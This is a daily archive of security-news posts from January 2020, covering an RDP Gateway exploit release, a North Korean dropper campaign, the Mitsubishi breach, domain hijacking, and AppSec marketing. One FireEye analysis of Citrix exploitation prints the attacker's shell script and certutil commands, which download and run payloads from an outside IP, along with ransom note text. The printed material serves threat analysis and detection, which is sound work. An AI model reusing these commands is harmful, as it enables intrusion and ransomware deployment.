Daily Archives: January 24, 2020

Expert released DOS Exploit PoC for Critical Windows RDP Gateway flaws

Danish security researcher Ollypwn has released DOS exploit PoC for critical vulnerabilities in the Windows RDP Gateway.

The Danish security researcher Ollypwn has published a proof-of-concept (PoC) denial of service exploit for the CVE-2020-0609 and CVE-2020-0610 vulnerabilities in the Remote Desktop Gateway (RD Gateway) component on Windows Server (2012, 2012 R2, 2016, and 2019) devices.

A Remote Desktop Gateway server is typically is located in a corporate or private network and acts as the gateway into which RDP connections from an external network connects through to access a Remote Desktop server (Terminal Server) located on the corporate or private network.

“A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the advisories published by Microsoft.

“To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems RD Gateway via RDP.”

Microsoft addressed the two vulnerabilities with the release of the January Patch Tuesday.

The PoC code released by the researcher also includes a built-in scanner for checking if a host is vulnerable to both CVE-2020-0609 and CVE-2020-0610 issues.

Scanning for vulnerable RDP Gateway servers with Shodan, the search engine has found over 15,500.

RDP Gateway

Experts suggest securing vulnerable RDP Gateway servers by installing the security updates ([1], [2]) released by Microsoft.

To mitigate the risk of exploitation it is possible to disable UDP ore protect access to UDP port.

“Simply disabling UDP Transport, or firewalling the UDP port (usually port 3391) is sufficient to prevent exploitation,” explained the popular researcher Marcus Hutchins.

Microsoft is not aware of attacks in the wild exploiting the above vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – RDP Gateway, hacking)

The post Expert released DOS Exploit PoC for Critical Windows RDP Gateway flaws appeared first on Security Affairs.

Threat Roundup for January 17 to January 24

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Jan 17 and Jan 24. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU01242020 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for January 17 to January 24 appeared first on Cisco Blogs.

For SMBs moving to the cloud, mindset and partners are key

Small and medium-sized businesses (SMBs) in Canada need to be proactive to overcome the barriers to adopting new technology. It’s a challenge for SMBs to develop a cloud strategy when many are just trying to keep their head above water, said Synnapex President and CEO Yoon-Soon Kim during a recent ITWC webinar. As a result,…

NK CARROTBALL dropper used in attacks on U.S. Govn Agency

A US Government agency was hit with a phishing attack attempting to deliver a new malware dropper dubbed CARROTBALL.

Security experts at Palo Alto Networks have uncovered a new malware dropper called CARROTBALL that was used in targeted attacks against a U.S. government agency and non-US foreign nationals.

Experts attribute the attack to the Konni Group, a North Korea-linked nation-state actor.

The attackers use a weaponized Microsoft Word document as a lure for the target, the phishing messages were sent from a Russian email address.

“Between July and October 2019, Unit 42 observed several malware families typically associated with the Konni Group (see Attribution section below for more details) used to primarily target a US government agency, using the ongoing and heightened geopolitical relations issues surrounding North Korea to lure targets into opening malicious email attachments.” reads the analysis published by Palo Alto Networks’s Unit42. “The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL.”

This campaign, which the researchers call Fractured Statue, used six unique document lures sent from four unique Russian email addresses.

The subject of the emails featured articles written in Russian pertaining to ongoing geopolitical relations issues surrounding North Korea. Five documents involved in the campaign contained CARROTBAT downloaders, and one contained a CARROTBALL downloader. Both downloaders were used to deliver the second-stage SYSCON malware.

Experts pointed out that the campaign appears as a resemblance to the Fractured Block campaign first uncovered by Unit 42 in November 2018, for this reason, the experts tracked this campaign as Fractured Statue.

Experts identified three different phases of the Fractured Statue campaign and CARROTBALL downloader was used only in the last one that sees the involvement of email messages with the subject “The investment climate of North Korea,” sent from the address “pryakhin20l0@mail[.]ru.”

“Also interesting to note is that the sender added multiple recipients to their email; one was an individual at a US government agency, and the other two individuals were non-US foreign nationals professionally affiliated with ongoing activities in North Korea” continues the analysis of the report.

CARROTBALL malware

Experts noticed that all of the malicious documents used in the campaign used the same macro that allowed attackers to determine the target Windows architecture, execute a command that was hidden in a textbox included in the document and then clear the contents of the textboxes and save the document.

In the last wave of the campaign, attackers used a different macro that doesn’t execute commands hidden in the document, instead it relied on an embedded Windows binary.

“The October 2019 attack, however, differed significantly from the previous ones. Instead of reading from the contents of the document itself, the macros leveraged an embedded Windows executable in the form of hex bytes delimited via the ‘|’ character that ultimately acted as a dropper.” continues the analysis. “When the macro was executed, the hex bytes were split, converted to binary, and dropped onto disk as an executable.”

When the macro executed, the hex bytes would be split and converted to binary, then the downloader dubbed CARROTBALL is dropped on the disk.

The name “Konni” identifies a Remote Access Trojan used in targeted campaigns carried out by North Korea-linked APT groups. Experts pointed out that as additional campaigns showing strongly overlapping TTPs yet did not feature the Konni RAT, some experts started using the “Konni” moniker to refer to the actors behind the aggregated set of activity

“Overall, the Fractured Statue campaign provides clear evidence that the TTPS discovered in Fractured Block are still relevant, and that the group behind the attacks still appears to be active.” concludes the report. “Additionally, development and use of the new downloader, CARROTBALL, alongside the more commonly observed malware delivery mechanism, CARROTBAT, may indicate that the previous methods employed by the group to successfully infect their targets are becoming less effective.”

Additional technical details are included in the report published by the Unit42.

Pierluigi Paganini

(SecurityAffairs – CARROTBALL, Fractured Statue)

The post NK CARROTBALL dropper used in attacks on U.S. Govn Agency appeared first on Security Affairs.

Mitsubishi Electric Discloses Major Data Breach

Mitsubishi Electric Corporation announced that it experienced a major data breach in June 2019 that has been traced back to a Chinese hacking group.

“[O]ur network has been subject to unauthorised access by third parties. We have confirmed that trade secrets may have leaked out,” the company announced in a brief press release January 20. 

The announcement from the electronics giant was released shortly after two Japanese newspapers, Nikkei and Asahi Shimbum reported on the breach.

“The leaked information seems to include information on social infrastructure such as defense, electric power and railways, information on ordering and development of products with business partners, and materials from executive meetings,” reported Nikkei

The company admitted that some data had been compromised, but denied that the data included defense contract and partner information. Japanese Secretary-General Yoshii Kan confirmed this in a press conference, stating that there was “no leak of sensitive information.”

According to Mitsubishi, the breach occurred as the result of a zero-day vulnerability in its anti-virus software that was exploited by hackers.

Asahi Shimbum has attributed the breach to Tick (also known as Bronze Butler and RedBaldKnight), a Chinese Advanced Persistent Threat (APT) group that has been linked to several other hacking campaigns against Japanese defense, biotech, and electronics companies.

The post Mitsubishi Electric Discloses Major Data Breach appeared first on Adam Levin.

New Bill Proposes NSA Surveillance Reforms

The newly-introduced bill targets the Patriot Act's Section 215, previously used by the U.S. government to collect telephone data from millions of Americans.

Choosing the right cloud for your business

By Hiren Parekh, Senior Director of Cloud Services, OVHcloud Introducing new company-wide initiatives can be daunting for CIOs, especially when it comes to assessing the best cloud environment for a business. While it’s no secret that IT managers consider the use of cloud services strategic to their business, implementing and maintaining these services isn’t always…

Nice Try: 501 (Ransomware) Not Implemented

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .net.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.net.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename

Functionality

MD5

x86.dll

32-bit Downloader

9aa67d856e584b4eefc4791d2634476a

x64.dll

64-bit Downloader

55b40e0068429fbbb16f2113d6842ed2

scan.py

Python socket scanner

b0acb27273563a5a2a5f71165606808c

xp_eternalblue.replay

Exploit replay file

6cf1857e569432fcfc8e506c8b0db635

eternalblue.replay

Exploit replay file

9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.
certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related about artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter, and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type

Indicator

Notes

Network

45[.]120[.]53[.]214

 

Network

198[.]44[.]227[.]126

 

Host

91dd06f49b09a2242d4085703599b7a7

piz.Lan

Host

01af5ad23a282d0fd40597c1024307ca

de.py

Host

bd977d9d2b68dd9b12a3878edd192319

ld.sh

Host

0caf9be8fd7ba5b605b7a7b315ef17a0

.new.zip

Host

9aa67d856e584b4eefc4791d2634476a

x86.dll

Host

55b40e0068429fbbb16f2113d6842ed2

x64.dll

Host

b0acb27273563a5a2a5f71165606808c

scan.py

Host

6cf1857e569432fcfc8e506c8b0db635

xp_eternalblue.replay

Host

9e408d947ceba27259e2a9a5c71a75a8

eternalblue.replay

Host

e345c861058a18510e7c4bb616e3fd9f

avpass.exe

Host

48452dd2506831d0b340e45b08799623

since1969.exe

Email Address

asgardmaster5@protonmail[.]com

From ransom note

Email Address

ragnar0k@ctemplar[.]com

From ransom note

Email Address

j.jasonm@yandex[.]com

From ransom note

Table 3: Collection of IOCs from this blog post

Does Your Domain Have a Registry Lock?

If you’re running a business online, few things can be as disruptive or destructive to your brand as someone stealing your company’s domain name and doing whatever they wish with it. Even so, most major Web site owners aren’t taking full advantage of the security tools available to protect their domains from being hijacked. Here’s the story of one recent victim who was doing almost everything possible to avoid such a situation and still had a key domain stolen by scammers.

On December 23, 2019, unknown attackers began contacting customer support people at OpenProvider, a popular domain name registrar based in The Netherlands. The scammers told the customer representatives they had just purchased from the original owner the domain e-hawk.net — which is part of a service that helps Web sites detect and block fraud — and that they were having trouble transferring the domain from OpenProvider to a different registrar.

The real owner of e-hawk.net is Raymond Dijkxhoorn, a security expert and entrepreneur who has spent much of his career making life harder for cybercrooks and spammers. Dijkxhoorn and E-HAWK’s CEO Peter Cholnoky had already protected their domain with a “registrar lock,” a service that requires the registrar to confirm any requested changes with the domain owner via whatever communications method is specified by the registrant.

In the case of e-hawk.net, however, the scammers managed to trick an OpenProvider customer service rep into transferring the domain to another registrar with a fairly lame social engineering ruse — and without triggering any verification to the real owners of the domain.

Specifically, the thieves contacted OpenProvider via WhatsApp, said they were now the rightful owners of the domain, and shared a short screen grab video showing the registrar’s automated system blocking the domain transfer (see video below).

“The support agent helpfully tried to verify if what the [scammers] were saying was true, and said, ‘Let’s see if we can move e-hawk.net from here to check if that works’,” Dijkxhoorn said. “But a registrar should not act on instructions coming from a random email address or other account that is not even connected to the domain in question.”

Dijkxhoorn shared records obtained from OpenProvider showing that on Dec. 23, 2019, the e-hawk.net domain was transferred to a reseller account within OpenProvider. Just three days later, that reseller account moved e-hawk.net to another registrar — Public Domain Registry (PDR).

“Due to the previously silent move to another reseller account within OpenProvider, we were not notified by the registrar about any changes,” Dijkxhoorn said. “This fraudulent move was possible due to successful social engineering towards the OpenProvider support team. We have now learned that after the move to the other OpenProvider account, the fraudsters could silently remove the registrar lock and move the domain to PDR.”

REGISTRY LOCK

Dijkxhoorn said one security precaution his company had not taken with their domain prior to the fraudulent transfer was a “registry lock,” a more stringent, manual (and sometimes offline) process that effectively neutralizes any attempts by fraudsters to social engineer your domain registrar.

With a registry lock in place, your registrar cannot move your domain to another registrar on its own. Doing so requires manual contact verification by the appropriate domain registry, such as Verisign — which is the authoritative registry for all domains ending in .com, .net, .name, .cc, .tv, .edu, .gov and .jobs. Other registries handle locks for specific top-level or country-code domains, including Nominet (for .co.uk or .uk domains), EURID (for .eu domains), CNNIC for (for .cn) domains, and so on.

According to data provided by digital brand protection firm CSC, while domains created in the top three most registered top-level domains (.com, .jp and .cn) are eligible for registry locks, just 22 percent of domain names tracked in Forbes’ list of the World’s Largest Public Companies have secured registry locks.

Unfortunately, not all registrars support registry locks (a list of top-level domains that do allow registry locks is here, courtesy of CSC). But as we’ll see in a moment, there are other security precautions that can and do help if your domain somehow ends up getting hijacked.

Dijkxhoorn said his company first learned of the domain theft on Jan. 13, 2020, which was the date the fraudsters got around to changing the domain name system (DNS) settings for e-hawk.net. That alert was triggered by systems E-HAWK had previously built in-house that continually monitor their stable of domains for any DNS changes.

By the way, this continuous monitoring of one’s DNS settings is a powerful approach to help blunt attacks on your domains and DNS infrastructure. Anyone curious about why this might be a good approach should have a look at this deep-dive from 2019 on “DNSpionage,” the name given to the exploits of an Iranian group that has successfully stolen countless passwords and VPN credentials from major companies via DNS-based attacks.

DNSSEC

Shortly after pointing e-hawk.net’s DNS settings to a server they controlled, the attackers were able to obtain at least one encryption certificate for the domain, which could have allowed them to intercept and read encrypted Web and email communications tied to e-hawk.net.

But that effort failed because E-HAWK’s owners also had enabled DNSSEC for their domains (a.k.a. “DNS Security Extensions”), which protects applications from using forged or manipulated DNS data by requiring that all DNS queries for a given domain or set of domains be digitally signed.

With DNSSEC properly enabled, if a name server determines that the address record for a given domain has not been modified in transit, it resolves the domain and lets the user visit the site. If, however, that record has been modified in some way or doesn’t match the domain requested, the name server blocks the user from reaching the fraudulent address.

While fraudsters who have hijacked your domain and/or co-opted access to your domain registrar can and usually will try to remove any DNSSEC records associated with the hijacked domain, it generally takes a few days for these updated records to be noticed and obeyed by the rest of the Internet.

As a result, having DNSSEC enabled for its domains bought E-HAWK an additional 48 hours or so with which to regain control over its domain before any encrypted traffic to and from e-hawk.net could have been intercepted.

In the end, E-HAWK was able to wrest back its hijacked domain in less than 48 hours, but only because its owners are on a first-name basis with many of the companies that manage the Internet’s global domain name system. Perhaps more importantly, they happened to know key people at PDR — the registrar to which the thieves moved the stolen domain.

Dijkxhoorn said without that industry access, E-HAWK probably would still be waiting to re-assume control over its domain.

“This process is normally not that quick,” he said, noting that most domains can’t be moved for at least 60 days after a successful transfer to another registrar.

In an interview with KrebsOnSecurity, OpenProvider CEO and Founder Arno Vis said said OpenProvider is reviewing its procedures and building systems to prevent support employees from overriding security checks that come with a registrar lock.

“We are building an extra layer of approval for things that support engineers shouldn’t be doing in the first place,” Vis said. “As far as I know, this is the first time something like this has happened to us.”

As in this case, crooks who specialize in stealing domains often pounce during holidays, when many registrars are short on well-trained staff. But Vis said the attack against E-HAWK targeted the company’s most senior support engineer.

“This is why social engineering is such a tricky thing, because in the end you still have a person who has to make a decision about something and in some cases they don’t make the right decision,” he said.

WHAT CAN YOU DO?

To recap, for maximum security on your domains, consider adopting some or all of the following best practices:

-Use registration features like Registry Lock that can help protect domain names records from being changed. Note that this may increase the amount of time it takes going forward to make key changes to the locked domain (such as DNS changes).

-Use DNSSEC (both signing zones and validating responses).

-Use access control lists for applications, Internet traffic and monitoring.

-Use 2-factor authentication, and require it to be used by all relevant users and subcontractors.

-In cases where passwords are used, pick unique passwords and consider password managers.

-Review the security of existing accounts with registrars and other providers, and make sure you have multiple notifications in place when and if a domain you own is about to expire.

-Monitor the issuance of new SSL certificates for your domains by monitoring, for example, Certificate Transparency Logs.

Forrester Study on the Benefits of Cloud vs. On-Premises AppSec

Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact™ of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data presented four business benefits and average cost savings associated with using SaaS-based AppSec:

Improved speed to scale saves 200 hours, annually

On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.

Faster time to market leads to additional $888,000 in annual profit  

Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if conducting post-deployment scans. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.

Annual legacy application costs of $1.86 million are avoided

The study found that Veracode costs 20 percent less to operate than on-premises solutions. This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save – on average – almost $3.9 million over the course of three years.

Real-time flaw identification saves $4.4 million over three years

Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are when eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.

Download the full study, SaaS vs. On-premises: The Total Economic Impact™ of Veracode’s SaaS-based Application Security Platform, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.

Russian Pleads Guilty to Running Online Criminal Marketplace

Russian Pleads Guilty to Running Online Criminal Marketplace

A Russian man has pleaded guilty to running an illegal online marketplace that sold stolen payment card credentials to criminals, who used them to make over $20m in fraudulent purchases.

Before a United States court, Aleksei Burkov admitted operating the Cardplanet website, which sold card data acquired through illegal computer intrusions. Many of the cards offered for sale belonged to United States citizens, with the result that over $20m in fraudulent purchases were made on American credit cards. 

According to the Associated Press, prosecutors said Burkov offered a money-back guarantee to his customers if a stolen card number no longer worked.

The 29-year-old also pleaded guilty to running a second website that served as an invite-only club where elite cyber-criminals could advertise stolen goods and criminal services.

Items for sale on the site included personal identifying information, malicious software, and money laundering and hacking services. 

"To obtain membership in Burkov’s cybercrime forum, prospective members needed three existing members to 'vouch' for their good reputation among cybercriminals and to provide a sum of money, normally $5,000, as insurance," said the Eastern District of Virginia US Attorney's Office.

"These measures were designed to keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum."

Burkov was arrested at Ben-Gurion Airport near Tel Aviv in December 2015, and in 2017, an Israeli district court approved his extradition to the United States. Burkov was finally extradited to the United States from Israel on November 11, 2019, after appeals to the Israeli Supreme Court and the Israeli High Court of Justice were denied.

In front of Senior US District Judge T.S. Ellis, III, Burkov pleaded guilty to access device fraud and conspiracy to commit computer intrusion, identity theft, wire and access device fraud, and money laundering. 

Burkov faces a maximum sentence of fifteen years in prison when sentenced on May 8.

Russian officials objected to Burkov's extradition from Israel. According to the Associated Press, Israeli officials have suggested Russia sought Burkov’s release by offering an exchange for Naama Issachar, a 26-year-old Israeli woman who received a seven-year prison sentence in Moscow for drug-related charges.

Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances

In a recent report, The State of Government Application Security, 2020, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding – backed by the Forrester Analytics Global Business Technographics® Security Survey, 2019 – is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common form of breaches, governments need to start investing heavily in application security (AppSec).

For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing occasional prerelease scans. According to Veracode’s State of Software Security Industry Snapshot, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of frequent scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, have less security debt.

It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This concept helps save time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans, it is about properly implementing prerelease tools. Here are three things to consider:

  • Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.
  • Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.
  • Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.

Although government agencies are currently falling behind with these vital security measures, with the right products and a little guidance, governments can be caught up in no time. Read the full Forrester report for details on the state of AppSec in government agencies.

<![CDATA[Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances ]]>

In a recent report, The State of Government Application Security, 2020, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding ??? backed by the Forrester Analytics Global Business Technographicsツョ Security Survey, 2019 ??? is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common form of breaches, governments need to start investing heavily in application security (AppSec).

For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing occasional prerelease scans. According to Veracode???s State of Software Security Industry Snapshot, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of frequent scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, have less security debt.

It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This concept helps save time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans, it is about properly implementing prerelease tools. Here are three things to consider:

  • Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.
  • Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.
  • Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.

Although government agencies are currently falling behind with these vital security measures, with the right products and a little guidance, governments can be caught up in no time. Read the full Forrester report for details on the state of AppSec in government agencies.

Rogers’ internal passwords and source code found open on GitHub

Sensitive data of another major Canadian firm has been found sitting open on the GitHub developers platform.

Security researcher Jason Coulls said he recently discovered two open accounts with application source code, internal user names and passwords, and private keys for Rogers Communications. No customer data was found.

He suspects the code belonged to a developer who has left the telco.

Coulls, who works in the IT department of a Toronto firm and has his own security consultancy, initially told The Register of the discovery, after which the news site contacted Rogers.

One problem is the code he saw describes data payloads and how it goes between databases and web services.

“You can use that to get to the stuff that people [thieves] would go after,” he explained.

In a statement late last night, a spokesperson for Rogers told The Register that “code for two applications posted on the repository hub could not be used to access any information about our customers, employees or partners, and at no time was any information at risk. The code and private keys for the web-based application have been obsolete for many years and the closed back-office application is not accessible on the Internet and the passwords to access it are disabled. We have multiple layers of security and we proactively monitor across all our applications, and there has been no activity.”

But in an interview with IT World Canada this morning Coulls said the problem is worse. Earlier today he discovered five more open folders on GitHub apparently with Rogers’ customer data.

“It has device identifier, customer’s phone number, how much they paid for it, how much Rogers paid in subsidies, what is on their plan. By most definitions that is a breach. It’s not a big one, but it’s a breach,” he said.

Rogers was not immediately available for comment.

Coulls often hunts GitHub looking for unprotected data belonging to Canadian banks so they can be warned.

Last September he accused Scotiabank of poor security after discovering someone had left bank application source code and private login keys to backend systems open on GitHub repositories.

Canadian banks are among the companies that aren’t tough enough on internal developers or contractors who are hired for application work, he said, and major firms should forbid developers from posting code on external repositories like Github.

In addition, Coulls is adamant that IT security teams need to be more aggressive in searching not only their own sites but sites like Github for unsecured applications.

US Issues Cybersecurity Warnings Over Flawed Medical Devices

US Issues Cybersecurity Warnings Over Flawed Medical Devices

Warnings have been issued in the United States after cybersecurity flaws were detected in medical monitoring devices manufactured by GE Healthcare Systems (GEHC). 

Safety notices were published yesterday by both the US Food and Drug Administration (FDA) and the US Department of Homeland Security's Industrial Control Systems—Cyber Emergency Response Team (ICS-CERT) regarding vulnerabilities in certain clinical information central stations and telemetry servers.

Exploitable flaws in the ApexPro and CARESCAPE telemetry servers, in version 1 of the CARESCAPE Central Station, and in CIC Pro Clinical Information Center Central Station version 1 were discovered by CyberMDX.

